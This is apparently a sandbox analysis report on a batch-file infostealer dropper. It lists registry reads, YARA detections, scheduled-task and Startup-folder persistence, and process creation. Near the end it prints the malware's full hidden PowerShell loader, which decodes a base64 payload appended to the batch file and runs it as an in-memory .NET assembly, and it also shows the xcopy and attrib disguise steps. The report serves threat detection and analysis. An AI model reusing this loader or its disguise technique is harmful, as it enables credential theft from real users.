Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found large BAT file

Source: 87M9Y3P4Z7.bat

Static file information: 1410688

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_028BF4E0	7_2_028BF4E0
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_028BB766	7_2_028BB766
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C85D6	7_2_088C85D6
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088CC6D0	7_2_088CC6D0
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088CD8D8	7_2_088CD8D8
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C0011	7_2_088C0011
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088CC9F7	7_2_088CC9F7
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C952A	7_2_088C952A
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C9538	7_2_088C9538
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_088C3E0F	7_2_088C3E0F
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B0011	7_2_089B0011
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B0040	7_2_089B0040
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B3188	7_2_089B3188
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B3141	7_2_089B3141
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_089B2A89	7_2_089B2A89
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C4EF98	7_2_08C4EF98
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C30040	7_2_08C30040
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C3001B	7_2_08C3001B
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Code function: 7_2_08C4E258	7_2_08C4E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00C441F0	8_2_00C441F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00C44AC0	8_2_00C44AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00C43EA8	8_2_00C43EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EBB4A8	8_2_05EBB4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB6780	8_2_05EB6780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB0040	8_2_05EB0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB3390	8_2_05EB3390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EBE959	8_2_05EBE959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB88A8	8_2_05EB88A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EBADC8	8_2_05EBADC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB8FFB	8_2_05EB8FFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB5988	8_2_05EB5988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_066C33D0	8_2_066C33D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB0025	8_2_05EB0025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_05EB0006	8_2_05EB0006
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_04B1F4E0	19_2_04B1F4E0
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_04B1B766	19_2_04B1B766
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092BC6D0	19_2_092BC6D0
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092BC9F7	19_2_092BC9F7
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092B0006	19_2_092B0006
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092BD8D8	19_2_092BD8D8
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_092B3E0F	19_2_092B3E0F
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A3141	19_2_093A3141
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A3188	19_2_093A3188
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A001E	19_2_093A001E
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A0040	19_2_093A0040
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_093A2A89	19_2_093A2A89
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_0983EF98	19_2_0983EF98
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_09820015	19_2_09820015
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_09820040	19_2_09820040
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Code function: 19_2_0983E258	19_2_0983E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00AE4AC0	20_2_00AE4AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00AE3EA8	20_2_00AE3EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00AE41F0	20_2_00AE41F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00AEF6D8	20_2_00AEF6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06086780	20_2_06086780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0608B4A8	20_2_0608B4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06083390	20_2_06083390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06080040	20_2_06080040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_060888A8	20_2_060888A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0608E959	20_2_0608E959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06088FFB	20_2_06088FFB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_0608ADC8	20_2_0608ADC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06085988	20_2_06085988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_067633D0	20_2_067633D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_06080007	20_2_06080007

Sample file is different than original file name gathered from version info

Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262268003.000000000293B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000005095000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230653577.0000000000454000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFittings-Pipping.exeB vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTdhvrq.dll" vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.000000000680D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename46da3e76-ea11-4ef3-9ed6-348209ad609f.exe4 vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2287026414.0000000007FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTdhvrq.dll" vs 87M9Y3P4Z7.bat
Source: 87M9Y3P4Z7.bat.Zhe.5.dr	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 87M9Y3P4Z7.bat

Yara signature match

Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 19.2.ChannelUris.bat.Zhe.6ea90f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.InstallUtil.exe.380000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.87M9Y3P4Z7.bat.Zhe.68232e8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Process Memory Space: 87M9Y3P4Z7.bat.Zhe PID: 5128, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: ChannelUris.bat.Zhe PID: 4892, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6797780.6.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.87M9Y3P4Z7.bat.Zhe.8940000.14.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winBAT@31/9@4/2

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktqy3wn.ooi.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" "

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\System32\chcp.com

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File read: C:\Users\user\Desktop\87M9Y3P4Z7.bat

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\87M9Y3P4Z7.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelUris.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
Source: C:\Windows\System32\xcopy.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe
